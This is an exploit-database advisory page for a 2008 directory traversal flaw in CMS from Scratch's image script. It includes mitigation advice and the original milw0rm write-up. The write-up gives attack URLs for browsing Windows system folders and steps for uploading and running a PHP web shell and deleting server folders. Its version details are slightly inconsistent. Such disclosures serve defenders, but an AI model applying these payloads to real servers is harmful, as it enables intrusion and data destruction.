CMS from Scratch - exploit.company

vendor:

CMS from Scratch

by:

Stack

7.5

CVSS

HIGH

Local Directory Traversal

22 (Path Traversal)

CWE

Product Name: CMS from Scratch

Affected Version From: 1.1.2003

Affected Version To: 1.1.2003

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability

A vulnerability in CMS from Scratch version 1.1.3 (image.php) allows an attacker to traverse the local directory structure and access sensitive files. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This will allow the attacker to access files outside of the web root directory. Additionally, an attacker can upload a malicious PHP file to the web server and execute it.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to directory traversal attacks. This can be done by validating user input and sanitizing it before it is used in file system operations.

Source

Exploit-DB raw data:

------------------------------------------------------------------------
   CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability
------------------------------------------------------------------------
 
   author...: Stack
 mail.....: Wanted
 wanted by Egix
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)

Exploit :
        #  http://localhost/path/cms/images.php?dir=c:
        Example :
        #  http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/
 
Exploit 2 :

          and you can upload php file ==>  php shell
          for example upload the php shell in my localhost
         c:AppServ/www/
         you go to link
        #  http://localhost/path/cms/images.php?dir=c:AppServ/www/
         after click to colon [parcourir] after select your shell and click upload
         and go to link
        #  http://localhost/shell.php
      desc :you can delete all folder of server
      just clike to mark delete in folder selected to delete

 thx : allah 

# milw0rm.com [2008-05-29]